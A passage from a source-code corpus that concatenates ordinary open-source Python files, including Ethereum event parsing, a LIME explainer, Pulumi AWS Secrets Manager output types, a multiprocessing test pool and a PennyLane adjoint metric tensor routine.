blocks_step = blocks_step // 2
if blocks_step < 100:
raise # stop trying
# else try with the smaller step
continue
# else some other error
raise
break # we must have a result
# Turn all Hex ints to ints
for e_idx, event in enumerate(new_events):
try:
block_number = deserialize_int_from_hex(
symbol=event['blockNumber'],
location='etherscan log query',
)
log_index = deserialize_int_from_hex(
symbol=event['logIndex'],
location='etherscan log query',
)
# Try to see if the event is a duplicate that got returned
# in the previous iteration
for previous_event in reversed(events):
if previous_event['blockNumber'] < block_number:
break
same_event = (
previous_event['logIndex'] == log_index and
previous_event['transactionHash'] == event['transactionHash']
)
if same_event:
events.pop()
new_events[e_idx]['address'] = deserialize_ethereum_address(
event['address'],
)
new_events[e_idx]['blockNumber'] = block_number
new_events[e_idx]['timeStamp'] = deserialize_int_from_hex(
symbol=event['timeStamp'],
location='etherscan log query',
)
new_events[e_idx]['gasPrice'] = deserialize_int_from_hex(
symbol=event['gasPrice'],
location='etherscan log query',
)
new_events[e_idx]['gasUsed'] = deserialize_int_from_hex(
symbol=event['gasUsed'],
location='etherscan log query',
)
new_events[e_idx]['logIndex'] = log_index
new_events[e_idx]['transactionIndex'] = deserialize_int_from_hex(
symbol=event['transactionIndex'],
location='etherscan log query',
)
except DeserializationError as e:
raise RemoteError(
'Couldnt decode an etherscan event due to {str(e)}}',
) from e
# etherscan will only return 1000 events in one go. If more than 1000
# are returned such as when no filter args are provided then continue
# the query from the last block
if len(new_events) == 1000:
start_block = new_events[-1]['blockNumber']
else:
start_block = end_block + 1
events.extend(new_events)
return events
def get_event_timestamp(self, event: Dict[str, Any]) -> Timestamp:
"""Reads an event returned either by etherscan or web3 and gets its timestamp
Etherscan events contain a timestamp. Normal web3 events don't so it needs to
be queried from the block number
WE could also add this to the get_logs() call but would add unnecessary
rpc calls for get_block_by_number() for each log entry. Better have it
lazy queried like this.
TODO: Perhaps better approach would be a log event class for this
"""
if 'timeStamp' in event:
# event from etherscan
return Timestamp(event['timeStamp'])
# event from web3
block_number = event['blockNumber']
block_data = self.get_block_by_number(block_number)
return Timestamp(block_data['timestamp'])
def _get_blocknumber_by_time_from_subgraph(self, ts: Timestamp) -> int:
"""Queries Ethereum Blocks Subgraph for closest block at or before given timestamp"""
response = self.blocks_subgraph.query(
f"""
{{
blocks(
first: 1, orderBy: timestamp, orderDirection: desc,
where: {{timestamp_lte: "{ts}"}}
) {{
id
number
timestamp
}}
}}
""",
)
try:
result = int(response['blocks'][0]['number'])
except (IndexError, KeyError) as e:
raise RemoteError(
f'Got unexpected ethereum blocks subgraph response: {response}',
) from e
else:
return result
def get_blocknumber_by_time(self, ts: Timestamp, etherscan: bool = True) -> int:
"""Searches for the blocknumber of a specific timestamp
- Performs the etherscan api call by default first
- If RemoteError raised or etherscan flag set to false
-> queries blocks subgraph
"""
if etherscan:
try:
return self.etherscan.get_blocknumber_by_time(ts)
except RemoteError:
pass
return self._get_blocknumber_by_time_from_subgraph(ts)
def get_basic_contract_info(self, address: ChecksumEthAddress) -> Dict[str, Any]:
"""
Query a contract address and return basic information as:
- Decimals
- name
- symbol
if it is provided in the contract. This method may raise:
- BadFunctionCallOutput: If there is an error calling a bad address
"""
cache = self.contract_info_cache.get(address)
if cache is not None:
return cache
properties = ('decimals', 'symbol', 'name')
info: Dict[str, Any] = {}
contract = EthereumContract(address=address, abi=ERC20TOKEN_ABI, deployed_block=0)
try:
# Output contains call status and result
output = multicall_2(
ethereum=self,
require_success=False,
calls=[(address, contract.encode(method_name=prop)) for prop in properties],
)
except RemoteError:
# If something happens in the connection the output should have
# the same length as the tuple of properties
output = [(False, b'')] * len(properties)
try:
decoded = [
contract.decode(x[1], method_name)[0] # pylint: disable=E1136
if x[0] and len(x[1]) else None
for (x, method_name) in zip(output, properties)
]
except OverflowError as e:
# This can happen when contract follows the ERC20 standard methods
# but name and symbol return bytes instead of string. UNIV1 LP is in this case
log.error(
f'{address} failed to decode as ERC20 token. Trying UNIV1 LP token. {str(e)}',
)
contract = EthereumContract(address=address, abi=UNIV1_LP_ABI, deployed_block=0)
decoded = [
contract.decode(x[1], method_name)[0] # pylint: disable=E1136
if x[0] and len(x[1]) else None
for (x, method_name) in zip(output, properties)
]
log.debug(f'{address} was succesfuly decoded as ERC20 token')
for prop, value in zip(properties, decoded):
if isinstance(value, bytes):
value = value.rstrip(b'\x00').decode()
info[prop] = value
self.contract_info_cache[address] = info
return info
|
featuretools/tests/testing_utils/cluster.py
|
ridicolos/featuretools
| 942 |
85549
|
from psutil import virtual_memory
def mock_cluster(n_workers=1,
threads_per_worker=1,
diagnostics_port=8787,
memory_limit=None,
**dask_kwarg):
return (n_workers, threads_per_worker, diagnostics_port, memory_limit)
class MockClient():
def __init__(self, cluster):
self.cluster = cluster
def scheduler_info(self):
return {'workers': {'worker 1': {'memory_limit': virtual_memory().total}}}
def get_mock_client_cluster():
return MockClient, mock_cluster
|
server/backend/app/db/utils/utils.py
|
chemetc/maskcam
| 179 |
85569
|
from datetime import datetime, timezone
from .enums import StatisticTypeEnum
def convert_timestamp_to_datetime(timestamp: float) -> datetime:
"""
Convert timestamp date format to datetime.
Arguments:
timestamp {float} -- Input timestamp.
Returns:
datetime -- Datetime formatted object which represents the
same information as timestamp.
"""
return datetime.fromtimestamp(timestamp, timezone.utc)
def get_enum_type(statistic_type: str) -> StatisticTypeEnum:
"""
Convert string object to enum.
Arguments:
statistic_type {str} -- Input string.
Returns:
StatisticTypeEnum -- Enum corresponding to statistic_type.
"""
return (
StatisticTypeEnum.ALERT
if statistic_type.lower() == "alerts"
else StatisticTypeEnum.REPORT
)
|
examples/datasets/plot_volume2D.py
|
mvdoc/pycortex
| 423 |
85570
|
<reponame>mvdoc/pycortex
"""
===================
Plot 2D Volume Data
===================
This plots example volume data onto an example subject, S1, onto a flatmap
using quickflat. In order for this to run, you have to have a flatmap for
this subject in the pycortex filestore.
The cortex.Volume2D object is instantiated with two numpy arrays of the same
size as the scan for this subject and transform. Here, there are two datasets
that have been generated to look like gradients across the brain, but you can
replace these with any numpy arrays of the correct dimensionality.
The colormap used in the first two flatmaps is
.. image:: ../../../filestore/colormaps/RdBu_covar.png
As with a 1D Volume, you can change vmin and vmax to threshold, but here
they can be manipulated individually for the two arrays.
You can also change the colormap when creating a new 2D volume. The colormap
used in the last flatmap is
.. image:: ../../../filestore/colormaps/GreenWhiteBlue_2D.png
"""
import cortex
import numpy as np
import matplotlib.pyplot as plt
subject = "S1"
xfm = "fullhead"
# Creating two different test datasets that are both the same shape as this
# transform with one entry for each voxel
# The matrices have just been reordered in different ways so that they make
# gradients across the brain in different directions
test_data1 = np.arange(31 * 100 * 100).reshape((31, 100, 100), order='C')
test_data2 = np.arange(31 * 100 * 100).reshape((31, 100, 100), order='F')
# This creates a 2D Volume object for both of our test datasets for the given
# subject and transform
vol_data = cortex.Volume2D(test_data1, test_data2, subject, xfm)
cortex.quickshow(vol_data, with_colorbar=False)
plt.show()
# You can alter the minimum and maximum values shown on the colorbar and this
# can be done separately for the two different datasets
vol_data = cortex.Volume2D(test_data1, test_data2, subject, xfm,
vmin=np.mean(test_data1), vmax=np.max(test_data1),
vmin2=np.min(test_data2), vmax2=np.mean(test_data2))
cortex.quickshow(vol_data, with_colorbar=False)
plt.show()
# To change the colormap, you have to create a new Volume2D object
vol_color = cortex.Volume2D(test_data1, test_data2, subject, xfm,
cmap="GreenWhiteBlue_2D")
cortex.quickshow(vol_color, with_colorbar=False)
plt.show()
|
mmocr/utils/data_convert_util.py
|
yuexy/mmocr
| 2,261 |
85586
|
<reponame>yuexy/mmocr
# Copyright (c) OpenMMLab. All rights reserved.
import mmcv
def convert_annotations(image_infos, out_json_name):
"""Convert the annotation into coco style.
Args:
image_infos(list): The list of image information dicts
out_json_name(str): The output json filename
Returns:
out_json(dict): The coco style dict
"""
assert isinstance(image_infos, list)
assert isinstance(out_json_name, str)
assert out_json_name
out_json = dict()
img_id = 0
ann_id = 0
out_json['images'] = []
out_json['categories'] = []
out_json['annotations'] = []
for image_info in image_infos:
image_info['id'] = img_id
anno_infos = image_info.pop('anno_info')
out_json['images'].append(image_info)
for anno_info in anno_infos:
anno_info['image_id'] = img_id
anno_info['id'] = ann_id
out_json['annotations'].append(anno_info)
ann_id += 1
img_id += 1
cat = dict(id=1, name='text')
out_json['categories'].append(cat)
if len(out_json['annotations']) == 0:
out_json.pop('annotations')
mmcv.dump(out_json, out_json_name)
return out_json
|
sdk/python/pulumi_aws/secretsmanager/outputs.py
|
RafalSumislawski/pulumi-aws
| 260 |
85590
|
<filename>sdk/python/pulumi_aws/secretsmanager/outputs.py<gh_stars>100-1000
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = [
'SecretReplica',
'SecretRotationRotationRules',
'SecretRotationRules',
'GetSecretRotationRotationRuleResult',
'GetSecretRotationRuleResult',
]
@pulumi.output_type
class SecretReplica(dict):
@staticmethod
def __key_warning(key: str):
suggest = None
if key == "kmsKeyId":
suggest = "kms_key_id"
elif key == "lastAccessedDate":
suggest = "last_accessed_date"
elif key == "statusMessage":
suggest = "status_message"
if suggest:
pulumi.log.warn(f"Key '{key}' not found in SecretReplica. Access the value via the '{suggest}' property getter instead.")
def __getitem__(self, key: str) -> Any:
SecretReplica.__key_warning(key)
return super().__getitem__(key)
def get(self, key: str, default = None) -> Any:
SecretReplica.__key_warning(key)
return super().get(key, default)
def __init__(__self__, *,
region: str,
kms_key_id: Optional[str] = None,
last_accessed_date: Optional[str] = None,
status: Optional[str] = None,
status_message: Optional[str] = None):
"""
:param str region: Region for replicating the secret.
:param str kms_key_id: ARN, Key ID, or Alias.
:param str last_accessed_date: Date that you last accessed the secret in the Region.
:param str status: Status can be `InProgress`, `Failed`, or `InSync`.
:param str status_message: Message such as `Replication succeeded` or `Secret with this name already exists in this region`.
"""
pulumi.set(__self__, "region", region)
if kms_key_id is not None:
pulumi.set(__self__, "kms_key_id", kms_key_id)
if last_accessed_date is not None:
pulumi.set(__self__, "last_accessed_date", last_accessed_date)
if status is not None:
pulumi.set(__self__, "status", status)
if status_message is not None:
pulumi.set(__self__, "status_message", status_message)
@property
@pulumi.getter
def region(self) -> str:
"""
Region for replicating the secret.
"""
return pulumi.get(self, "region")
@property
@pulumi.getter(name="kmsKeyId")
def kms_key_id(self) -> Optional[str]:
"""
ARN, Key ID, or Alias.
"""
return pulumi.get(self, "kms_key_id")
@property
@pulumi.getter(name="lastAccessedDate")
def last_accessed_date(self) -> Optional[str]:
"""
Date that you last accessed the secret in the Region.
"""
return pulumi.get(self, "last_accessed_date")
@property
@pulumi.getter
def status(self) -> Optional[str]:
"""
Status can be `InProgress`, `Failed`, or `InSync`.
"""
return pulumi.get(self, "status")
@property
@pulumi.getter(name="statusMessage")
def status_message(self) -> Optional[str]:
"""
Message such as `Replication succeeded` or `Secret with this name already exists in this region`.
"""
return pulumi.get(self, "status_message")
@pulumi.output_type
class SecretRotationRotationRules(dict):
@staticmethod
def __key_warning(key: str):
suggest = None
if key == "automaticallyAfterDays":
suggest = "automatically_after_days"
if suggest:
pulumi.log.warn(f"Key '{key}' not found in SecretRotationRotationRules. Access the value via the '{suggest}' property getter instead.")
def __getitem__(self, key: str) -> Any:
SecretRotationRotationRules.__key_warning(key)
return super().__getitem__(key)
def get(self, key: str, default = None) -> Any:
SecretRotationRotationRules.__key_warning(key)
return super().get(key, default)
def __init__(__self__, *,
automatically_after_days: int):
"""
:param int automatically_after_days: Specifies the number of days between automatic scheduled rotations of the secret.
"""
pulumi.set(__self__, "automatically_after_days", automatically_after_days)
@property
@pulumi.getter(name="automaticallyAfterDays")
def automatically_after_days(self) -> int:
"""
Specifies the number of days between automatic scheduled rotations of the secret.
"""
return pulumi.get(self, "automatically_after_days")
@pulumi.output_type
class SecretRotationRules(dict):
@staticmethod
def __key_warning(key: str):
suggest = None
if key == "automaticallyAfterDays":
suggest = "automatically_after_days"
if suggest:
pulumi.log.warn(f"Key '{key}' not found in SecretRotationRules. Access the value via the '{suggest}' property getter instead.")
def __getitem__(self, key: str) -> Any:
SecretRotationRules.__key_warning(key)
return super().__getitem__(key)
def get(self, key: str, default = None) -> Any:
SecretRotationRules.__key_warning(key)
return super().get(key, default)
def __init__(__self__, *,
automatically_after_days: int):
"""
:param int automatically_after_days: Specifies the number of days between automatic scheduled rotations of the secret.
"""
pulumi.set(__self__, "automatically_after_days", automatically_after_days)
@property
@pulumi.getter(name="automaticallyAfterDays")
def automatically_after_days(self) -> int:
"""
Specifies the number of days between automatic scheduled rotations of the secret.
"""
return pulumi.get(self, "automatically_after_days")
@pulumi.output_type
class GetSecretRotationRotationRuleResult(dict):
def __init__(__self__, *,
automatically_after_days: int):
pulumi.set(__self__, "automatically_after_days", automatically_after_days)
@property
@pulumi.getter(name="automaticallyAfterDays")
def automatically_after_days(self) -> int:
return pulumi.get(self, "automatically_after_days")
@pulumi.output_type
class GetSecretRotationRuleResult(dict):
def __init__(__self__, *,
automatically_after_days: int):
pulumi.set(__self__, "automatically_after_days", automatically_after_days)
@property
@pulumi.getter(name="automaticallyAfterDays")
def automatically_after_days(self) -> int:
return pulumi.get(self, "automatically_after_days")
|
braintree/exceptions/http/connection_error.py
|
futureironman/braintree_python
| 182 |
85618
|
from braintree.exceptions.unexpected_error import UnexpectedError
class ConnectionError(UnexpectedError):
pass
|
third_party/typ/typ/pool.py
|
tingshao/catapult
| 2,151 |
85619
|
<filename>third_party/typ/typ/pool.py<gh_stars>1000+
# Copyright 2014 Google Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import copy
import multiprocessing
import pickle
import traceback
from typ.host import Host
def make_pool(host, jobs, callback, context, pre_fn, post_fn):
_validate_args(context, pre_fn, post_fn)
if jobs > 1:
return _ProcessPool(host, jobs, callback, context, pre_fn, post_fn)
else:
return _AsyncPool(host, jobs, callback, context, pre_fn, post_fn)
class _MessageType(object):
Request = 'Request'
Response = 'Response'
Close = 'Close'
Done = 'Done'
Error = 'Error'
Interrupt = 'Interrupt'
values = [Request, Response, Close, Done, Error, Interrupt]
def _validate_args(context, pre_fn, post_fn):
try:
_ = pickle.dumps(context)
except Exception as e:
raise ValueError('context passed to make_pool is not picklable: %s'
% str(e))
try:
_ = pickle.dumps(pre_fn)
except pickle.PickleError:
raise ValueError('pre_fn passed to make_pool is not picklable')
try:
_ = pickle.dumps(post_fn)
except pickle.PickleError:
raise ValueError('post_fn passed to make_pool is not picklable')
class _ProcessPool(object):
def __init__(self, host, jobs, callback, context, pre_fn, post_fn):
self.host = host
self.jobs = jobs
self.requests = multiprocessing.Queue()
self.responses = multiprocessing.Queue()
self.workers = []
self.discarded_responses = []
self.closed = False
self.erred = False
for worker_num in range(1, jobs + 1):
w = multiprocessing.Process(target=_loop,
args=(self.requests, self.responses,
host.for_mp(), worker_num,
callback, context,
pre_fn, post_fn))
w.start()
self.workers.append(w)
def send(self, msg):
self.requests.put((_MessageType.Request, msg))
def get(self):
msg_type, resp = self.responses.get()
if msg_type == _MessageType.Error:
self._handle_error(resp)
elif msg_type == _MessageType.Interrupt:
raise KeyboardInterrupt
assert msg_type == _MessageType.Response
return resp
def close(self):
for _ in self.workers:
self.requests.put((_MessageType.Close, None))
self.closed = True
def join(self):
# TODO: one would think that we could close self.requests in close(),
# above, and close self.responses below, but if we do, we get
# weird tracebacks in the daemon threads multiprocessing starts up.
# Instead, we have to hack the innards of multiprocessing. It
# seems likely that there's a bug somewhere, either in this module or
# in multiprocessing.
# pylint: disable=protected-access
if self.host.is_python3: # pragma: python3
multiprocessing.queues.is_exiting = lambda: True
else: # pragma: python2
multiprocessing.util._exiting = True
if not self.closed:
# We must be aborting; terminate the workers rather than
# shutting down cleanly.
for w in self.workers:
w.terminate()
w.join()
return []
final_responses = []
error = None
interrupted = None
for w in self.workers:
while True:
msg_type, resp = self.responses.get()
if msg_type == _MessageType.Error:
error = resp
break
if msg_type == _MessageType.Interrupt:
interrupted = True
break
if msg_type == _MessageType.Done:
final_responses.append(resp[1])
break
self.discarded_responses.append(resp)
for w in self.workers:
w.join()
# TODO: See comment above at the beginning of the function for
# why this is commented out.
# self.responses.close()
if error:
self._handle_error(error)
if interrupted:
raise KeyboardInterrupt
return final_responses
def _handle_error(self, msg):
worker_num, tb = msg
self.erred = True
raise Exception("Error from worker %d (traceback follows):\n%s" %
(worker_num, tb))
# 'Too many arguments' pylint: disable=R0913
def _loop(requests, responses, host, worker_num,
callback, context, pre_fn, post_fn, should_loop=True):
host = host or Host()
try:
context_after_pre = pre_fn(host, worker_num, context)
keep_looping = True
while keep_looping:
message_type, args = requests.get(block=True)
if message_type == _MessageType.Close:
responses.put((_MessageType.Done,
(worker_num, post_fn(context_after_pre))))
break
assert message_type == _MessageType.Request
resp = callback(context_after_pre, args)
responses.put((_MessageType.Response, resp))
keep_looping = should_loop
except KeyboardInterrupt as e:
responses.put((_MessageType.Interrupt, (worker_num, str(e))))
except Exception as e:
responses.put((_MessageType.Error,
(worker_num, traceback.format_exc(e))))
class _AsyncPool(object):
def __init__(self, host, jobs, callback, context, pre_fn, post_fn):
self.host = host or Host()
self.jobs = jobs
self.callback = callback
self.context = copy.deepcopy(context)
self.msgs = []
self.closed = False
self.post_fn = post_fn
self.context_after_pre = pre_fn(self.host, 1, self.context)
self.final_context = None
def send(self, msg):
self.msgs.append(msg)
def get(self):
return self.callback(self.context_after_pre, self.msgs.pop(0))
def close(self):
self.closed = True
self.final_context = self.post_fn(self.context_after_pre)
def join(self):
if not self.closed:
self.close()
return [self.final_context]
|
tensorflow_graphics/projects/points_to_3Dobjects/utils/image.py
|
Liang813/graphics
| 2,759 |
85633
|
<gh_stars>1000+
# Copyright 2020 The TensorFlow Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Image functions."""
# python3
from cvx2 import latest as cv2
import numpy as np
def get_affine_transform(center, scale, rot, output_size, inverse=False):
"""Affine transform."""
if not isinstance(scale, (np.ndarray, list)):
scale = np.array([scale, scale], dtype=np.float32)
dst_w, dst_h = output_size[0], output_size[1]
rot_rad = np.pi * rot / 180
src_dir = get_dir([0, scale[0] * -0.5], rot_rad)
dst_dir = np.array([0, dst_w * -0.5], np.float32)
src = np.zeros((3, 2), dtype=np.float32)
dst = np.zeros((3, 2), dtype=np.float32)
src[0, :], src[1, :] = center, center + src_dir
dst[0, :] = [dst_w * 0.5, dst_h * 0.5]
dst[1, :] = np.array([dst_w * 0.5, dst_h * 0.5], np.float32) + dst_dir
src[2:, :] = get_3rd_point(src[0, :], src[1, :])
dst[2:, :] = get_3rd_point(dst[0, :], dst[1, :])
if inverse:
transform = cv2.getAffineTransform(np.float32(dst), np.float32(src))
else:
transform = cv2.getAffineTransform(np.float32(src), np.float32(dst))
return transform
def get_3rd_point(point_1, point_2):
tmp_point = point_1 - point_2
return point_2 + np.array([-tmp_point[1], tmp_point[0]], dtype=np.float32)
def get_dir(point, rot_rad):
sin_rot, cos_rot = np.sin(rot_rad), np.cos(rot_rad)
result = [0, 0]
result[0] = point[0] * cos_rot - point[1] * sin_rot
result[1] = point[0] * sin_rot + point[1] * cos_rot
return np.array(result)
def transform_points(points, center, scale, output_size, inverse=False):
transform = get_affine_transform(
center, scale, 0, output_size, inverse=inverse)
new_points = np.concatenate([points, np.ones([points.shape[0], 1])], axis=1)
points_transformed = np.dot(transform, new_points.T).T
return points_transformed
def transform_predictions(points, center, scale, output_size):
return transform_points(points, center, scale, output_size, inverse=True)
|
explainers.py
|
marcotcr/lime-kdd
| 267 |
85643
|
from abc import ABCMeta, abstractmethod
import numpy as np
import scipy as sp
from sklearn import linear_model
import sklearn.metrics.pairwise
###############################
## Random Explainer
###############################
class RandomExplainer:
def __init__(self):
pass
def reset(self):
pass
def explain_instance(self,
instance_vector,
label,
classifier,
num_features,
dataset):
nonzero = instance_vector.nonzero()[1]
explanation = np.random.choice(nonzero, num_features)
return [(x, 1) for x in explanation]
def explain(self,
train_vectors,
train_labels,
classifier,
num_features,
dataset):
i = np.random.randint(0, train_vectors.shape[0])
explanation = self.explain_instance(train_vectors[i], None, None,
num_features, dataset)
return i, explanation
###############################
## Standalone Explainers
###############################
def most_important_word(classifier, v, class_):
# Returns the word w that moves P(Y) - P(Y|NOT w) the most for class Y.
max_index = 0
max_change = -1
orig = classifier.predict_proba(v)[0][class_]
for i in v.nonzero()[1]:
val = v[0,i]
v[0,i] = 0
pred = classifier.predict_proba(v)[0][class_]
change = orig - pred
if change > max_change:
max_change = change
max_index = i
v[0,i] = val
if max_change < 0:
return -1
return max_index
def explain_greedy(instance_vector,
label,
classifier,
num_features,
dataset=None):
explanation = []
z = instance_vector.copy()
while len(explanation) < num_features:
i = most_important_word(classifier, z, label)
if i == -1:
break
z[0,i] = 0
explanation.append(i)
return [(x, 1) for x in explanation]
def most_important_word_martens(predict_fn, v, class_):
# Returns the word w that moves P(Y) - P(Y|NOT w) the most for class Y.
max_index = 0
max_change = -1
orig = predict_fn(v)[0,class_]
for i in v.nonzero()[1]:
val = v[0,i]
v[0,i] = 0
pred = predict_fn(v)[0,class_]
change = orig - pred
if change > max_change:
max_change = change
max_index = i
v[0,i] = val
if max_change < 0:
return -1, max_change
return max_index, max_change
def explain_greedy_martens(instance_vector,
label,
predict_fn,
num_features,
dataset=None):
if not hasattr(predict_fn, '__call__'):
predict_fn = predict_fn.predict_proba
explanation = []
z = instance_vector.copy()
cur_score = predict_fn(instance_vector)[0, label]
while len(explanation) < num_features:
i, change = most_important_word_martens(predict_fn, z, label)
cur_score -= change
if i == -1:
break
explanation.append(i)
if cur_score < .5:
break
z[0,i] = 0
return [(x, 1) for x in explanation]
def data_labels_distances_mapping_text(x, classifier_fn, num_samples):
distance_fn = lambda x : sklearn.metrics.pairwise.cosine_distances(x[0],x)[0] * 100
features = x.nonzero()[1]
vals = np.array(x[x.nonzero()])[0]
doc_size = len(sp.sparse.find(x)[2])
sample = np.random.randint(1, doc_size, num_samples - 1)
data = np.zeros((num_samples, len(features)))
inverse_data = np.zeros((num_samples, len(features)))
data[0] = np.ones(doc_size)
inverse_data[0] = vals
features_range = range(len(features))
for i, s in enumerate(sample, start=1):
active = np.random.choice(features_range, s, replace=False)
data[i, active] = 1
for j in active:
inverse_data[i, j] = 1
sparse_inverse = sp.sparse.lil_matrix((inverse_data.shape[0], x.shape[1]))
sparse_inverse[:, features] = inverse_data
sparse_inverse = sp.sparse.csr_matrix(sparse_inverse)
mapping = features
labels = classifier_fn(sparse_inverse)
distances = distance_fn(sparse_inverse)
return data, labels, distances, mapping
# This is LIME
class GeneralizedLocalExplainer:
def __init__(self,
kernel_fn,
data_labels_distances_mapping_fn,
num_samples=5000,
lasso=True,
mean=None,
return_mean=False,
return_mapped=False,
lambda_=None,
verbose=True,
positive=False):
# Transform_classifier, transform_explainer,
# transform_explainer_to_classifier all take raw data in, whatever that is.
# perturb(x, num_samples) returns data (perturbed data in f'(x) form),
# inverse_data (perturbed data in x form) and mapping, where mapping is such
# that mapping[i] = j, where j is an index for x form.
# distance_fn takes raw data in. what we're calling raw data is just x
self.lambda_ = lambda_
self.kernel_fn = kernel_fn
self.data_labels_distances_mapping_fn = data_labels_distances_mapping_fn
self.num_samples = num_samples
self.lasso = lasso
self.mean = mean
self.return_mapped=return_mapped
self.return_mean = return_mean
self.verbose = verbose
self.positive=positive;
def reset(self):
pass
def data_labels_distances_mapping(self, raw_data, classifier_fn):
data, labels, distances, mapping = self.data_labels_distances_mapping_fn(raw_data, classifier_fn, self.num_samples)
return data, labels, distances, mapping
def generate_lars_path(self, weighted_data, weighted_labels):
X = weighted_data
alphas, active, coefs = linear_model.lars_path(X, weighted_labels, method='lasso', verbose=False, positive=self.positive)
return alphas, coefs
def explain_instance_with_data(self, data, labels, distances, label, num_features):
weights = self.kernel_fn(distances)
weighted_data = data * weights[:, np.newaxis]
if self.mean is None:
mean = np.mean(labels[:, label])
else:
mean = self.mean
shifted_labels = labels[:, label] - mean
if self.verbose:
print 'mean', mean
weighted_labels = shifted_labels * weights
used_features = range(weighted_data.shape[1])
nonzero = used_features
alpha = 1
if self.lambda_:
classif = linear_model.Lasso(alpha=self.lambda_, fit_intercept=False, positive=self.positive)
classif.fit(weighted_data, weighted_labels)
used_features = classif.coef_.nonzero()[0]
if used_features.shape[0] == 0:
if self.return_mean:
return [], mean
else:
return []
elif self.lasso:
alphas, coefs = self.generate_lars_path(weighted_data, weighted_labels)
for i in range(len(coefs.T) - 1, 0, -1):
nonzero = coefs.T[i].nonzero()[0]
if len(nonzero) <= num_features:
chosen_coefs = coefs.T[i]
alpha = alphas[i]
break
used_features = nonzero
debiased_model = linear_model.Ridge(alpha=0, fit_intercept=False)
debiased_model.fit(weighted_data[:, used_features], weighted_labels)
if self.verbose:
print 'Prediction_local', debiased_model.predict(data[0, used_features].reshape(1, -1)) + mean, 'Right:', labels[0, label]
if self.return_mean:
return sorted(zip(used_features,
debiased_model.coef_),
key=lambda x:np.abs(x[1]), reverse=True), mean
else:
return sorted(zip(used_features,
debiased_model.coef_),
key=lambda x:np.abs(x[1]), reverse=True)
def explain_instance(self,
raw_data,
label,
classifier_fn,
num_features, dataset=None):
if not hasattr(classifier_fn, '__call__'):
classifier_fn = classifier_fn.predict_proba
data, labels, distances, mapping = self.data_labels_distances_mapping(raw_data, classifier_fn)
if self.return_mapped:
if self.return_mean:
exp, mean = self.explain_instance_with_data(data, labels, distances, label, num_features)
else:
exp = self.explain_instance_with_data(data, labels, distances, label, num_features)
exp = [(mapping[x[0]], x[1]) for x in exp]
if self.return_mean:
return exp, mean
else:
return exp
return self.explain_instance_with_data(data, labels, distances, label, num_features), mapping
|
pennylane/transforms/adjoint_metric_tensor.py
|
therooler/pennylane
| 539 |
85652
|
# Copyright 2018-2021 Xanadu Quantum Technologies Inc.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Contains the adjoint_metric_tensor.
"""
import warnings
from itertools import chain
from pennylane import numpy as np
import pennylane as qml
# pylint: disable=protected-access
from pennylane.transforms.metric_tensor import _contract_metric_tensor_with_cjac
def _apply_operations(state, op, device, invert=False):
"""Wrapper that allows to apply a variety of operations---or groups
of operations---to a state or to prepare a new state.
If ``invert=True``, this function makes sure not to alter the operations.
The state of the device, however may be altered, depending on the
device and performed operation(s).
"""
# pylint: disable=protected-access
if isinstance(op, (list, np.ndarray)):
if invert:
op = op[::-1]
for _op in op:
state = _apply_operations(state, _op, device, invert)
return state
if isinstance(op, qml.QubitStateVector):
if invert:
raise ValueError("Can't invert state preparation.")
device._apply_state_vector(op.parameters[0], op.wires)
return device._state
if isinstance(op, qml.BasisState):
if invert:
raise ValueError("Can't invert state preparation.")
device._apply_basis_state(op.parameters[0], op.wires)
return device._state
if invert:
op.inv()
state = device._apply_operation(state, op)
if invert:
op.inv()
return state
def _group_operations(tape):
"""Divide all operations of a tape into trainable operations and blocks
of untrainable operations after each trainable one."""
# Extract tape operations list
ops = tape.operations
# Find the indices of trainable operations in the tape operations list
trainables = np.where([qml.operation.is_trainable(op) for op in ops])[0]
# Add the indices incremented by one to the trainable indices
split_ids = list(chain.from_iterable([idx, idx + 1] for idx in trainables))
# Split at trainable and incremented indices to get groups after trainable
# operations and single trainable operations (in alternating order)
all_groups = np.split(ops, split_ids)
# Collect trainable operations and groups after trainable operations
# the first set of non-trainable ops are the ops "after the -1st" trainable op
group_after_trainable_op = dict(enumerate(all_groups[::2], start=-1))
trainable_operations = list(chain.from_iterable(all_groups[1::2]))
return trainable_operations, group_after_trainable_op
def adjoint_metric_tensor(circuit, device=None, hybrid=True):
r"""Implements the adjoint method outlined in
`Jones <https://arxiv.org/abs/2011.02991>`__ to compute the metric tensor.
A forward pass followed by intermediate partial backwards passes are
used to evaluate the metric tensor in :math:`\mathcal{O}(p^2)` operations,
where :math:`p` is the number of trainable operations, using 4 state
vectors.
.. note::
The adjoint metric tensor method has the following restrictions:
* Currently only ``"default.qubit"`` with ``shots=None`` is supported.
* We assume the circuit to be composed of unitary gates only and rely
on the ``generator`` property of the gates to be implemented.
Note also that this makes the metric tensor strictly real-valued.
Args:
circuit (.QuantumTape or .QNode): Circuit to compute the metric tensor of
device (.Device): Device to use for the adjoint method
hybrid (bool): Whether to take classical preprocessing into account. Ignored if
``circuit`` is a tape.
Returns:
array: the metric tensor of the tape with respect to its trainable parameters.
Dimensions are ``(tape.num_params, tape.num_params)``.
.. seealso:: :func:`~.metric_tensor` for hardware-compatible metric tensor computations.
**Example**
Consider the following QNode:
.. code-block:: python
dev = qml.device("default.qubit", wires=3)
@qml.qnode(dev, interface="autograd")
